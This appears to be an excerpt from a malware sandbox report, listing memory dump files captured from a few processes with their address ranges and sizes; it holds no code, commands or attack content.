memory/5524-1626-0x00000000746A0000-0x0000000074C51000-memory.dmpFilesize
5.7MB
-
memory/5524-1628-0x00000000746A0000-0x0000000074C51000-memory.dmpFilesize
5.7MB
-
memory/5524-1633-0x00000000746A0000-0x0000000074C51000-memory.dmpFilesize
5.7MB
-
memory/5524-1627-0x0000000001680000-0x0000000001690000-memory.dmpFilesize
64KB
-
memory/5684-1718-0x0000000000400000-0x000000000056F000-memory.dmpFilesize
1.4MB
-
memory/5684-1704-0x0000000000400000-0x000000000056F000-memory.dmpFilesize
1.4MB
-
memory/5684-1717-0x000000000ADC0000-0x000000000ADF4000-memory.dmpFilesize
208KB
-
memory/5684-13137-0x0000000000400000-0x000000000056F000-memory.dmpFilesize
1.4MB
-
memory/34364-26735-0x0000000001930000-0x0000000001940000-memory.dmpFilesize
64KB
-
memory/34364-26748-0x00000000746A0000-0x0000000074C51000-memory.dmpFilesize
5.7MB
-
memory/34364-26736-0x00000000746A0000-0x0000000074C51000-memory.dmpFilesize
5.7MB
-
memory/34364-26734-0x00000000746A0000-0x0000000074C51000-memory.dmpFilesize
5.7MB
-
memory/34428-26737-0x0000000000400000-0x000000000056F000-memory.dmpFilesize
1.4MB
-
memory/34428-26769-0x000000000AC80000-0x000000000ACB4000-memory.dmpFilesize
208KB
-
memory/34428-26770-0x0000000000400000-0x000000000056F000-memory.dmpFilesize
1.4MB
-
memory/34428-26781-0x0000000000400000-0x000000000056F000-memory.dmpFilesize
1.4MB